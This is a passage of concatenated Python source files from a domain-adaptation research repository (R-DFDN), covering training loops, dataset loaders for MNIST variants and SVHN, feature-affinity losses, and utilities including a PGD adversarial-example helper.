        total += targets.size(0)
        correct += predicted.eq(targets.data).cpu().sum()
        # nn.utils.clip_grad_norm_(model.parameters(), 0.1)
        optimizer.step()
        optimizer.zero_grad()
    acc = 100.*correct/total
    return total_loss/(batch_idx+1), acc, tot_regularization_loss/(batch_idx+1)
# Optimizer over all model parameters, best-metric trackers, and per-epoch
# metric histories (pickled each epoch inside train_fn).
optimizer = torch.optim.Adam(params, lr=args.lr, weight_decay=args.wdecay)
best_acc, best_loss =0, np.inf
train_loss_list, train_acc_list, valid_acc_list, test_acc_list, reg_loss_list = [], [], [], [], []
# Beta annealing: start from 0.0001 and double each epoch (in train_fn) until
# the originally requested --beta value (stashed in beta_) is reached.
if args.anneal_beta:
    beta_ = args.beta
    args.beta = 0.0001
def train_fn():
    """Outer training loop: one train epoch, test (and optional validation),
    pickle all metric histories, log a status line, and anneal beta.

    Mutates module globals `epoch` and `args.beta`; reads beta_ via closure.
    NOTE(review): `best_loss` is declared global but never updated here.
    """
    global epoch, args, best_loss, best_acc
    while epoch<args.epochs:
        epoch+=1
        loss, train_acc, regularization_loss= train(epoch)
        train_loss_list.append(loss)
        train_acc_list.append(train_acc)
        reg_loss_list.append(regularization_loss)
        # test() with save=True checkpoints on new best test accuracy.
        test_acc = test(testloader, model=model, save=True, epoch=epoch)
        test_acc_list.append(test_acc)
        if args.validation:
            val_acc = test(validloader, model=model, save=False)
            valid_acc_list.append(val_acc)
            with open(args.save_dir + "/val_acc.pkl", "wb") as f:
                pkl.dump(valid_acc_list, f)
            print('val-acc acc {:3.2f}'.format(val_acc))
        # Persist full metric histories every epoch (overwrites prior files).
        with open(args.save_dir + "/train_loss.pkl", "wb") as f:
            pkl.dump(train_loss_list, f)
        with open(args.save_dir + "/train_acc.pkl", "wb") as f:
            pkl.dump(train_acc_list, f)
        with open(args.save_dir + "/test_acc.pkl", "wb") as f:
            pkl.dump(test_acc_list, f)
        with open(args.save_dir + "/reg_loss_list.pkl", "wb") as f:
            pkl.dump(reg_loss_list, f)
        status = 'Epoch {}/{} | Loss {:3.4f} | acc {:3.2f} | test-acc {:3.2f} | reg_loss : {:3.4f}'.\
        format( epoch, args.epochs, loss, train_acc, test_acc, regularization_loss)
        print (status)
        with open(args.save_dir + '/log.txt', 'a') as f:
            f.write(status + '\n')
        print('-' * 89)
        # Geometric beta schedule, capped at the originally requested value.
        if args.anneal_beta:
            args.beta = min([beta_, 2.* args.beta])
            print('beta ', args.beta)
# Kick off training and record the final best test accuracy in the log.
train_fn()
status = '| End of training | best test acc {:3.4f} '.format(best_acc)
print(status)
with open(args.save_dir + '/log.txt', 'a') as f:
    f.write(status + '\n')
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,820
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/train_RDFDN.py
|
from RDFDN import R_DFDN, Loss
from argparse import Namespace
import sys
import argparse
import math
import numpy as np
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch import autograd
import pickle as pkl
import torch.nn.functional as F
from utils import correlation_reg
import glob
import tqdm
import torch.utils.data as utils
import json
from data import get_dataset
from tensorboardX import SummaryWriter
# CLI, run-directory setup, seeding, and multi-domain data loading for the
# R-DFDN domain-adaptation training script.
parser = argparse.ArgumentParser(description='Predicting with adgm')
# Directories
parser.add_argument('--data', type=str, default='datasets/',
                    help='location of the data corpus')
parser.add_argument('--root_dir', type=str, default='default/',
                    help='root dir path to save the log and the final model')
parser.add_argument('--save_dir', type=str, default='0/',
                    help='dir path (inside root_dir) to save the log and the final model')
parser.add_argument('--load_dir', type=str, default='',
                    help='dir path (inside root_dir) to load model from')
parser.add_argument('--use_tfboard', type=bool, default=True,
                    help='use tensorboard')
# Baseline (correlation based) method
parser.add_argument('--beta', type=float, default=0.1,
                    help='coefficient for correlation based penalty')
# adaptive batch norm
parser.add_argument('--bn_eval', action='store_true',
                    help='adapt BN stats during eval')
# dataset and architecture
parser.add_argument('--dataset', type=str, default='fgbg_cmnist_cpr0.5-0.5',
                    help='dataset name')
parser.add_argument('--arch', type=str, default='resnet',
                    help='arch name (resnet,cnn)')
# Optimization hyper-parameters
parser.add_argument('--seed', type=int, default=1111,
                    help='random seed')
parser.add_argument('--bs', type=int, default=128, metavar='N',
                    help='batch size')
parser.add_argument('--lr', type=float, default=0.001,
                    help='learning rate ')
parser.add_argument('--epochs', type=int, default=300,
                    help='upper epoch limit')
parser.add_argument('--init', type=str, default="he")
parser.add_argument('--wdecay', type=float, default=1e-4,
                    help='weight decay applied to all weights')
# meta specifications
parser.add_argument('--validation', action='store_true',
                    help='Compute accuracy on validation set at each epoch')
parser.add_argument('--cuda', action='store_false',
                    help='use CUDA')
parser.add_argument('--gpu', nargs='+', type=int, default=[0])
args = parser.parse_args()
args.root_dir = os.path.join('runs/', args.root_dir)
args.save_dir = os.path.join(args.root_dir, args.save_dir)
if not os.path.exists(args.save_dir):
    os.makedirs(args.save_dir)
log_dir = args.save_dir + '/'
with open(args.save_dir + '/config.txt', 'w') as f:
    json.dump(args.__dict__, f, indent=2)
with open(args.save_dir + '/log.txt', 'w') as f:
    f.write('python ' + ' '.join(s for s in sys.argv) + '\n')
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(str(i) for i in args.gpu)
if args.use_tfboard:
    writer = SummaryWriter("final_result")
# Set the random seed manually for reproducibility.
use_cuda = torch.cuda.is_available()
torch.manual_seed(args.seed)
if use_cuda:
    torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
print('==> Preparing data..')
# Source domain first (args.dataset default: fgbg_cmnist_cpr0.5-0.5), then
# args.dataset is mutated to load each extra evaluation domain.
# NOTE(review): no USPS loader is built here, yet the evaluation block below
# references `testloader_usps` — that name is undefined in this script.
trainloader_s, validloader_s, testloader_s, nb_classes_s, dim_inp_s = get_dataset(args)
args.dataset = 'svhn'
trainloader_svhn, validloader_svhn, testloader_svhn, nb_classes_svhn, dim_inp_svhn = get_dataset(args)
args.dataset = 'mnist'
trainloader_mnist, validloader_mnist, testloader_mnist, nb_classes_mnist, dim_inp_mnist = get_dataset(args)
args.dataset = 'mnistm'
trainloader_mnistm, validloader_mnistm, testloader_mnistm, nb_classes_mnistm, dim_inp_mnistm = get_dataset(args)
###############################################################################
# Build the model
###############################################################################
model = R_DFDN()
params = list(model.parameters())
model = torch.nn.DataParallel(model, device_ids=range(len(args.gpu)))
optimizer = torch.optim.Adam(params, lr=args.lr, weight_decay=args.wdecay)
nb = 0
# He (Kaiming) initialization for conv weights; unit-gamma/zero-beta for BN.
if args.init == 'he':
    for m in model.modules():
        if isinstance(m, nn.Conv2d):
            nb += 1
            # print ('Update init of ', m)
            n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
            m.weight.data.normal_(0, math.sqrt(2. / n))
        elif isinstance(m, nn.BatchNorm2d):
            # print ('Update init of ', m)
            m.weight.data.fill_(1)
            m.bias.data.zero_()
print('Number of Conv layers: ', (nb))
if use_cuda:
    model.cuda()
total_params = sum(np.prod(x.size()) if len(x.size()) > 1 else x.size()[0] for x in model.parameters())
print('Args:', args)
print('Model total parameters:', total_params)
with open(args.save_dir + '/log_adgm.txt', 'a') as f:
    f.write(str(args) + ',total_params=' + str(total_params) + '\n')
# Composite R-DFDN loss (classification + reconstruction + FA + diff terms).
loss = Loss()
###############################################################################
# Training/Testing code
###############################################################################
tot_iters = len(trainloader_s)
def test(loader, model, save=False, is_generation=True):
    """Evaluate `model` on `loader`; return top-1 accuracy (%).

    `is_generation` is forwarded to the model's forward pass (generation vs.
    adaptation branch). `save` is accepted for interface compatibility but is
    unused here. Reads module global `use_cuda`.
    """
    global best_acc, args
    model.eval()
    correct, total = 0, 0
    # BUG FIX: next(iter(loader)) re-created the iterator every step, so a
    # non-shuffled test loader evaluated the SAME first batch repeatedly.
    for inputs, targets in tqdm.tqdm(loader, total=len(loader)):
        if use_cuda:
            inputs, targets = inputs.cuda(), targets.cuda()
        with torch.no_grad():
            inputs, targets = Variable(inputs), Variable(targets)
            class_pred = model(inputs, inputs, is_generation=is_generation, is_train=False)
            _, predicted = torch.max(nn.Softmax(dim=1)(class_pred).data, 1)
            total += targets.size(0)
            correct += predicted.eq(targets.data).cpu().sum()
    acc = 100. * float(correct) / float(total)
    return acc
# Main R-DFDN training loop over paired source/target batches, with per-epoch
# evaluation on all domains.
# NOTE(review): three issues to confirm/fix upstream:
#   1. `next(iter(loader))` per step rebuilds each DataLoader iterator, so
#      shuffled loaders sample batches with replacement instead of sweeping
#      an epoch (and pay worker startup cost every step).
#   2. `testloader_usps` is never defined in this script — the USPS eval line
#      will raise NameError at the first evaluation epoch.
#   3. `correct_adp` compares target-domain predictions against SOURCE labels
#      (targets_s), which only makes sense if the two loaders are aligned.
# best_acc slots: [svhn, source, mnist, mnistm, usps].
best_acc = [0, 0, 0, 0,0]
for epoch in range(args.epochs):
    # adjust_lr(init_lr=1e-3, optimizer=optimizer, epoch=epoch, total_epo=args.epochs)
    model.train()
    correct_gen, correct_adp = 0, 0
    total = 0
    # totol_class_loss,totol_class_loss2,totol_regulazation_loss,totol_l=0,0,0,0
    for batch_idx in tqdm.tqdm(range(tot_iters), total=tot_iters):
        inputs_s, targets_s = next(iter(trainloader_s))
        inputs_t, targets_t = next(iter(trainloader_mnistm))
        if use_cuda:
            inputs_s, targets_s = inputs_s.cuda(), targets_s.cuda()
            inputs_t, targets_t = inputs_t.cuda(), targets_t.cuda()
        inputs_s = Variable(inputs_s)
        inputs_t = Variable(inputs_t)
        # Joint forward pass over source and target; returns predictions plus
        # the invariant/characteristic features and reconstruction.
        hid, source_pred,tar_pred,source_inv_diff,tar_inv_diff,tar_cha_diff,tar_rec,source_inv,tar_inv= model(
            sourse_input=inputs_s,tar_input=inputs_t, is_generation=False, is_train=True)
        hid_1_loss, s_class_loss, t_class_loss, t_recognition_loss,fa_loss,t_diff_loss,totol_loss = loss(hid = hid,
            targets = targets_s,source_pred = source_pred,tar_pred= tar_pred,source_inv_diff = source_inv_diff,tar_inv_diff = tar_inv_diff,
            tar_cha_diff = tar_cha_diff,tar_rec = tar_rec,tar_img = inputs_t,source_inv = source_inv,tar_inv = tar_inv,
            weight_list=[0.1,1,1,0.1,0.1,0.1])
        totol_loss.backward()
        _, predicted_gen = torch.max(nn.Softmax(dim=1)(source_pred).data, 1)
        _, predicted_adp = torch.max(nn.Softmax(dim=1)(tar_pred).data, 1)
        total += targets_s.size(0)
        correct_gen += predicted_gen.eq(targets_s.data).cpu().sum()
        correct_adp += predicted_adp.eq(targets_s.data).cpu().sum()
        optimizer.step()
        optimizer.zero_grad()
        # Per-iteration loss curves for TensorBoard.
        if args.use_tfboard:
            writer.add_scalar("Loss/hid_1_loss", hid_1_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
            writer.add_scalar("Loss/s_class_loss", s_class_loss.data.cpu(),
                              global_step=tot_iters * epoch + batch_idx)
            writer.add_scalar("Loss/t_class_loss", t_class_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
            writer.add_scalar("Loss/t_recognition_loss", t_recognition_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
            writer.add_scalar("Loss/fa_loss", fa_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
            writer.add_scalar("Loss/t_diff_loss", t_diff_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
            writer.add_scalar("Loss/totol_loss", totol_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
    acc_gen = 100. * correct_gen / total
    acc_adp = 100. * correct_adp / total
    print(f"|| Epoch: {epoch} || train_gen_acc: {acc_gen} || train_adp_acc: {acc_adp} || lr:{optimizer.state_dict()['param_groups'][0]['lr']}")
    # sche.step()
    # Evaluate on every domain each epoch and track per-domain bests.
    if epoch % 1 == 0:
        all_acc = []
        svhn_test_acc = test(testloader_svhn, model, is_generation=True)
        all_acc.append(svhn_test_acc)
        minists_test_acc = test(testloader_s, model, is_generation=True)
        all_acc.append(minists_test_acc)
        mnist_test_acc = test(testloader_mnist, model, is_generation=True)
        all_acc.append(mnist_test_acc)
        mnistm_test_acc = test(testloader_mnistm, model, is_generation=False)
        all_acc.append(mnistm_test_acc)
        usps_test_acc = test(testloader_usps, model, is_generation=True)
        all_acc.append(usps_test_acc)
        for i in range(len(all_acc)):
            if all_acc[i] > best_acc[i]:
                best_acc[i] = all_acc[i]
        print(
            f"Epoch: {epoch} ######## best_sv{best_acc[0]}######## best_s{best_acc[1]}######## best_minist{best_acc[2]}"
            f"######## best_ministm{best_acc[3]} ######## best_usps{best_acc[4]}")
        writer.add_scalar("Eval/minists_test_acc", minists_test_acc, global_step=epoch)
        writer.add_scalar("Eval/svhn_test_acc", svhn_test_acc, global_step=epoch)
        writer.add_scalar("Eval/mnist_test_acc", mnist_test_acc, global_step=epoch)
        writer.add_scalar("Eval/mnistm_test_acc", mnistm_test_acc, global_step=epoch)
        writer.add_scalar("Eval/usps_test_acc", usps_test_acc, global_step=epoch)
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,821
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/data.py
|
from argparse import Namespace
import argparse
import numpy as np
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
from utils import _split_train_val
import torchvision.datasets as datasets
import torch.utils.data as utils
import errno
from PIL import Image
torch.manual_seed(0)
NUM_WORKERS = 0
def get_dataset(args):
    """Build train/valid/test DataLoaders for the dataset named by args.dataset.

    Supported names: 'mnist', any name containing 'cmnist' (pre-generated
    colored-MNIST .npy files), 'mnistm', 'svhn'.

    Returns:
        (trainloader, validloader, testloader, nb_classes, dim_inp)

    Raises:
        ValueError: for an unrecognized dataset name. (The original silently
        fell through and crashed with UnboundLocalError at the return.)
    """
    if args.dataset=='mnist':
        trans = ([ transforms.ToTensor()])
        trans = transforms.Compose(trans)
        fulltrainset = torchvision.datasets.MNIST(root=args.data, train=True, transform=trans, download=True)
        train_set, valset = _split_train_val(fulltrainset, val_fraction=0)
        trainloader = torch.utils.data.DataLoader(train_set, batch_size=args.bs, shuffle=True,
                                                  num_workers=NUM_WORKERS, pin_memory=True)
        validloader = torch.utils.data.DataLoader(valset, batch_size=args.bs, shuffle=False,
                                                  num_workers=NUM_WORKERS, pin_memory=True)
        test_set = torchvision.datasets.MNIST(root=args.data, train=False, transform=trans)
        testloader = torch.utils.data.DataLoader(test_set, batch_size=args.bs, shuffle=False, num_workers=NUM_WORKERS)
        nb_classes = 10
        dim_inp=28*28
    elif 'cmnist' in args.dataset:
        # NOTE: hard-codes the cpr0.5-0.5 variant regardless of which cmnist
        # name was requested.
        data_dir_cmnist = args.data + 'cmnist/' + 'fgbg_cmnist_cpr0.5-0.5' + '/'
        data_x = np.load(data_dir_cmnist+'train_x.npy')
        data_y = np.load(data_dir_cmnist+'train_y.npy')
        data_x = torch.from_numpy(data_x).type('torch.FloatTensor')
        data_y = torch.from_numpy(data_y).type('torch.LongTensor')
        my_dataset = utils.TensorDataset(data_x,data_y)
        train_set, valset = _split_train_val(my_dataset, val_fraction=0)
        trainloader = torch.utils.data.DataLoader(train_set, batch_size=args.bs, shuffle=True, num_workers=NUM_WORKERS)
        validloader = torch.utils.data.DataLoader(valset, batch_size=args.bs, shuffle=False,
                                                  num_workers=NUM_WORKERS, pin_memory=True)
        data_x = np.load(data_dir_cmnist+'test_x.npy')
        data_y = np.load(data_dir_cmnist+'test_y.npy')
        data_x = torch.from_numpy(data_x).type('torch.FloatTensor')
        data_y = torch.from_numpy(data_y).type('torch.LongTensor')
        my_dataset = utils.TensorDataset(data_x,data_y)
        testloader = torch.utils.data.DataLoader(my_dataset, batch_size=args.bs, shuffle=False, num_workers=NUM_WORKERS)
        nb_classes = 10
        dim_inp=28*28* 3
    elif args.dataset=='mnistm':
        trans = ([transforms.ToTensor()])
        trans = transforms.Compose(trans)
        fulltrainset = MNISTM(root=args.data, train=True, transform=trans, download=True)
        train_set, valset = _split_train_val(fulltrainset, val_fraction=0)
        # Consistency fix: use the module-wide NUM_WORKERS constant instead of
        # the hard-coded 0/2 worker counts this branch previously mixed in.
        trainloader = torch.utils.data.DataLoader(train_set, batch_size=args.bs, shuffle=True,
                                                  num_workers=NUM_WORKERS, pin_memory=True)
        validloader = torch.utils.data.DataLoader(valset, batch_size=args.bs, shuffle=False,
                                                  num_workers=NUM_WORKERS, pin_memory=True)
        test_set = MNISTM(root=args.data, train=False, transform=trans)
        testloader = torch.utils.data.DataLoader(test_set, batch_size=args.bs, shuffle=False, num_workers=NUM_WORKERS)
        nb_classes = 10
        dim_inp=3*28*28 # np.prod(train_set.data.size()[1:])
    elif args.dataset=='svhn':
        trans = ([torchvision.transforms.Resize((28,28), interpolation=2), transforms.ToTensor()])
        trans = transforms.Compose(trans)
        fulltrainset = torchvision.datasets.SVHN(args.data, split='train', transform=trans, target_transform=None, download=True)
        train_set, valset = _split_train_val(fulltrainset, val_fraction=0)
        trainloader = torch.utils.data.DataLoader(train_set, batch_size=args.bs, shuffle=True,
                                                  num_workers=NUM_WORKERS, pin_memory=True)
        validloader = torch.utils.data.DataLoader(valset, batch_size=args.bs, shuffle=False,
                                                  num_workers=NUM_WORKERS, pin_memory=True)
        test_set = torchvision.datasets.SVHN(args.data, split='test', transform=trans, target_transform=None, download=True)
        testloader = torch.utils.data.DataLoader(test_set, batch_size=args.bs, shuffle=False, num_workers=NUM_WORKERS)
        nb_classes = 10
        dim_inp=3*28*28
    else:
        raise ValueError('Unknown dataset: %s' % args.dataset)
    return trainloader, validloader, testloader, nb_classes, dim_inp
class MNISTM(torch.utils.data.Dataset):
    """`MNIST-M Dataset.`

    MNIST-M images are downloaded as a pickled archive and paired with the
    standard MNIST labels (the label order matches — see download()).
    """
    # Where the pickled MNIST-M images are fetched from.
    url = "https://github.com/VanushVaswani/keras_mnistm/releases/download/1.0/keras_mnistm.pkl.gz"
    raw_folder = 'raw'
    processed_folder = 'processed'
    training_file = 'mnist_m_train.pt'
    test_file = 'mnist_m_test.pt'

    def __init__(self,
                 root, mnist_root="data",
                 train=True,
                 transform=None, target_transform=None,
                 download=False):
        """Init MNIST-M dataset.

        root: directory holding raw/processed MNIST-M files.
        mnist_root: directory for the plain MNIST download (labels source).
        train: select the training split (else the test split).
        transform / target_transform: applied in __getitem__.
        download: fetch and process the data if not already present.
        """
        super(MNISTM, self).__init__()
        self.root = os.path.expanduser(root)
        self.mnist_root = os.path.expanduser(mnist_root)
        self.transform = transform
        self.target_transform = target_transform
        self.train = train  # training set or test set
        if download:
            self.download()
        if not self._check_exists():
            raise RuntimeError('Dataset not found.' +
                               ' You can use download=True to download it')
        if self.train:
            self.train_data, self.train_labels = \
                torch.load(os.path.join(self.root,
                                        self.processed_folder,
                                        self.training_file))
        else:
            self.test_data, self.test_labels = \
                torch.load(os.path.join(self.root,
                                        self.processed_folder,
                                        self.test_file))

    def __getitem__(self, index):
        """Get images and target for data loader.

        Args:
            index (int): Index
        Returns:
            tuple: (image, target) where target is index of the target class.
        """
        if self.train:
            img, target = self.train_data[index], self.train_labels[index]
        else:
            img, target = self.test_data[index], self.test_labels[index]
        # doing this so that it is consistent with all other datasets
        # to return a PIL Image
        img = Image.fromarray(img.squeeze().numpy(), mode='RGB')
        if self.transform is not None:
            img = self.transform(img)
        if self.target_transform is not None:
            target = self.target_transform(target)
        return img, target

    def __len__(self):
        """Return size of dataset."""
        if self.train:
            return len(self.train_data)
        else:
            return len(self.test_data)

    def _check_exists(self):
        # Both processed .pt files must exist for the dataset to be usable.
        return os.path.exists(os.path.join(self.root,
                                           self.processed_folder,
                                           self.training_file)) and \
               os.path.exists(os.path.join(self.root,
                                           self.processed_folder,
                                           self.test_file))

    def download(self):
        """Download, unpack, and convert the MNIST-M data to .pt files."""
        # import essential packages
        from six.moves import urllib
        import gzip
        import pickle
        from torchvision import datasets
        # check if dataset already exists
        if self._check_exists():
            return
        # make data dirs
        try:
            os.makedirs(os.path.join(self.root, self.raw_folder))
            os.makedirs(os.path.join(self.root, self.processed_folder))
        except OSError as e:
            if e.errno == errno.EEXIST:
                pass
            else:
                raise
        # download pkl files
        print('Downloading ' + self.url)
        filename = self.url.rpartition('/')[2]
        file_path = os.path.join(self.root, self.raw_folder, filename)
        if not os.path.exists(file_path.replace('.gz', '')):
            data = urllib.request.urlopen(self.url)
            with open(file_path, 'wb') as f:
                f.write(data.read())
            # Decompress next to the .gz, then remove the archive.
            with open(file_path.replace('.gz', ''), 'wb') as out_f, \
                    gzip.GzipFile(file_path) as zip_f:
                out_f.write(zip_f.read())
            os.unlink(file_path)
        # process and save as torch files
        print('Processing...')
        # load MNIST-M images from pkl file
        with open(file_path.replace('.gz', ''), "rb") as f:
            mnist_m_data = pickle.load(f, encoding='bytes')
        mnist_m_train_data = torch.ByteTensor(mnist_m_data[b'train'])
        mnist_m_test_data = torch.ByteTensor(mnist_m_data[b'test'])
        # get MNIST labels (MNIST-M images are ordered like MNIST, so the
        # labels carry over directly).
        # NOTE(review): .train_labels/.test_labels are deprecated attribute
        # names in newer torchvision (use .targets) — confirm version.
        mnist_train_labels = datasets.MNIST(root=self.mnist_root,
                                            train=True,
                                            download=True).train_labels
        mnist_test_labels = datasets.MNIST(root=self.mnist_root,
                                           train=False,
                                           download=True).test_labels
        # save MNIST-M dataset
        training_set = (mnist_m_train_data, mnist_train_labels)
        test_set = (mnist_m_test_data, mnist_test_labels)
        with open(os.path.join(self.root,
                               self.processed_folder,
                               self.training_file), 'wb') as f:
            torch.save(training_set, f)
        with open(os.path.join(self.root,
                               self.processed_folder,
                               self.test_file), 'wb') as f:
            torch.save(test_set, f)
        print('Done!')
if __name__ == '__main__':
    import matplotlib.pyplot as plt

    parser = argparse.ArgumentParser(description='Predicting with high correlation features')
    # Directories
    parser.add_argument('--data', type=str, default='datasets/',
                        help='location of the data corpus')
    parser.add_argument('--root_dir', type=str, default='default/',
                        help='root dir path to save the log and the final model')
    parser.add_argument('--save_dir', type=str, default='0/',
                        help='dir path (inside root_dir) to save the log and the final model')
    # dataset
    parser.add_argument('--dataset', type=str, default='cmnist',
                        help='dataset name')
    # Adaptive BN
    parser.add_argument('--bn_eval', action='store_true',
                        help='adapt BN stats during eval')
    # hyperparameters
    parser.add_argument('--seed', type=int, default=1111,
                        help='random seed')
    parser.add_argument('--bs', type=int, default=128, metavar='N',
                        help='batch size')
    # meta specifications
    parser.add_argument('--cuda', action='store_false',
                        help='use CUDA')
    parser.add_argument('--gpu', nargs='+', type=int, default=[0])
    args = parser.parse_args()

    print('==> Preparing data..')
    trainloader, validloader, testloader, nb_classes, dim_inp = get_dataset(args)
    print(len(trainloader), len(validloader), len(testloader))

    def imshow(img):
        """Display a (C, H, W) image tensor with matplotlib."""
        npimg = img.numpy()
        plt.imshow(np.transpose(npimg, (1, 2, 0)))
        plt.show()

    # Fix: DataLoader iterators no longer expose a .next() method in
    # Python 3 / recent PyTorch; use the next() builtin instead.
    dataiter = iter(trainloader)
    images, labels = next(dataiter)
    index = labels == 1  # visualize only samples of class 1
    images = images[index]
    print(images.shape)
    imshow(torchvision.utils.make_grid(images))
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,822
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/FALoss.py
|
import torch
import torch.nn as nn
class FALoss(nn.Module):
    """Feature-affinity loss.

    Penalizes the mean absolute difference between the pairwise
    (cosine) similarity matrices of source and target feature maps.
    """

    def __init__(self):
        super(FALoss, self).__init__()

    def get_sim(self, fea):
        """Similarity matrix between all spatial positions of `fea`
        (shape (B, C, H, W)) -> (B, H*W, H*W)."""
        batch, channels, height, width = fea.shape
        flat = fea.view(batch, channels, -1).permute((0, 2, 1))
        # L2-normalize each position vector; the epsilon guards against
        # division by zero for all-zero vectors.
        norms = torch.norm(flat, p=2, dim=2)
        flat = (flat.permute(2, 1, 0) / (norms.permute(1, 0) + 1e-6)).permute(2, 1, 0)
        return torch.matmul(flat, flat.permute(0, 2, 1))

    def forward(self, source_fea, target_fea):
        return torch.mean(torch.abs(self.get_sim(target_fea) - self.get_sim(source_fea)))
class DiffLoss(nn.Module):
    """Difference loss encouraging two feature batches to be orthogonal.

    Each input is flattened per sample and L2-normalized (the norm is
    detached so gradients only flow through directions); the loss is the
    mean squared entry of the cross-correlation matrix.
    """

    def __init__(self):
        super(DiffLoss, self).__init__()

    def forward(self, input1, input2):
        n = input1.size(0)
        flat1 = input1.view(n, -1)
        flat2 = input2.view(n, -1)
        norm1 = torch.norm(flat1, p=2, dim=1, keepdim=True).detach()
        unit1 = flat1.div(norm1.expand_as(flat1) + 1e-6)
        norm2 = torch.norm(flat2, p=2, dim=1, keepdim=True).detach()
        unit2 = flat2.div(norm2.expand_as(flat2) + 1e-6)
        return torch.mean(unit1.t().mm(unit2).pow(2))
if __name__ == '__main__':
pass
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,823
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/utils.py
|
import torch.nn as nn
import torch.nn.init as init
import torch
from torch.autograd import Variable
import numpy as np
import torch.autograd as autograd
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.nn.init import zeros_, ones_
import tqdm
class AttackPGD(nn.Module):
    """Projected Gradient Descent (PGD) adversarial-attack wrapper.

    config keys:
        random_start: if truthy, start from a uniform random point inside
            the epsilon-ball around the input.
        step_size: per-iteration signed-gradient step size.
        epsilon: L-infinity perturbation budget.
        num_steps: number of PGD iterations.
    """
    def __init__(self, config):
        super(AttackPGD, self).__init__()
        self.rand = config['random_start']
        self.step_size = config['step_size']
        self.epsilon = config['epsilon']
        self.num_steps = config['num_steps']

    def forward(self, inputs, targets, basic_net):
        """Run PGD against basic_net and return its output on the
        resulting adversarial examples (assumes inputs in [0, 1])."""
        x = inputs.detach()
        if self.rand:
            x = x + torch.zeros_like(x).uniform_(-self.epsilon, self.epsilon)
        for i in range(self.num_steps):
            x.requires_grad_()
            with torch.enable_grad():
                logits = basic_net(x)
                loss = F.cross_entropy(logits, targets, reduction='sum')
            grad = torch.autograd.grad(loss, [x])[0]
            # Ascent step on the loss, then project back into the
            # epsilon-ball around the clean input and the valid range.
            x = x.detach() + self.step_size*torch.sign(grad.detach())
            x = torch.min(torch.max(x, inputs - self.epsilon), inputs + self.epsilon)
            x = torch.clamp(x, 0, 1)
        return basic_net(x)
def pairing_loss(logit1, logit2, stochastic_pairing=False):
    """Mean (per-sample) squared distance between two logit batches.

    With stochastic_pairing=True the rows of logit2 are randomly permuted
    before pairing (uses np.random; seed externally for determinism).
    """
    batch_size = logit1.size()[0]
    if stochastic_pairing:
        target = logit2[np.random.permutation(logit1.shape[0])]
    else:
        target = logit2
    return torch.sum((target - logit1) ** 2) / batch_size
def dim_permute(h):
    """Swap the first two axes of h and flatten everything after axis 0.

    A (N, C, H, W) tensor becomes (C, N*H*W); a (N, C) tensor becomes (C, N).
    """
    if len(h.size()) > 2:
        swapped = h.permute(1, 0, 2, 3).contiguous()
    else:
        swapped = h.permute(1, 0).contiguous()
    return swapped.view(swapped.size(0), -1)
def compute_l2_norm(h, subtract_mean=False):
    """Frobenius norm of h after channel-first flattening via dim_permute.

    If subtract_mean is True, each channel row is first centered by its
    mean over all remaining positions.
    """
    flat = dim_permute(h)
    if subtract_mean:
        flat = flat - flat.mean(dim=1, keepdim=True)
    return torch.sqrt((flat ** 2).sum())
def correlation_reg(hid, targets, within_class=True, subtract_mean=True):
    """Sum of squared (optionally mean-centered) L2 norms of hid.

    within_class=True computes the norm separately over the samples of
    each class in `targets` (a numpy-compatible label array) and sums the
    squared norms; otherwise a single norm over the whole batch is used.
    """
    if not within_class:
        return compute_l2_norm(hid, subtract_mean=subtract_mean) ** 2
    total = 0
    for label in np.unique(targets):
        members = np.where(targets == label)[0]
        total = total + compute_l2_norm(hid[members], subtract_mean=subtract_mean) ** 2
    return total
def idx2onehot(idx, n, h=1, w=1):
    """Convert class indices to one-hot (optionally spatial) tensors.

    idx: LongTensor of shape (B,) or (B, 1) with values < n.
    Returns a (B, n) one-hot tensor, or (B, n, h, w) with the one-hot
    vector broadcast over the spatial grid when h*w > 1.

    NOTE(review): allocates directly on CUDA via .cuda(); this will fail
    on CPU-only machines — confirm all callers run on GPU.
    """
    assert torch.max(idx).item() < n
    if idx.dim() == 1:
        idx = idx.unsqueeze(1)
    onehot = torch.zeros(idx.size(0), n).cuda()
    # scatter_ writes 1 at each sample's class column.
    onehot.scatter_(1, idx, 1)
    if h*w>1:
        onehot = onehot.view(idx.size(0), n, 1, 1)
        onehot_tensor = torch.ones(idx.size(0), n, h, w).cuda()
        onehot = onehot_tensor* onehot
    return onehot
def _split_train_val(trainset, val_fraction=0, nsamples=-1):
if nsamples>-1:
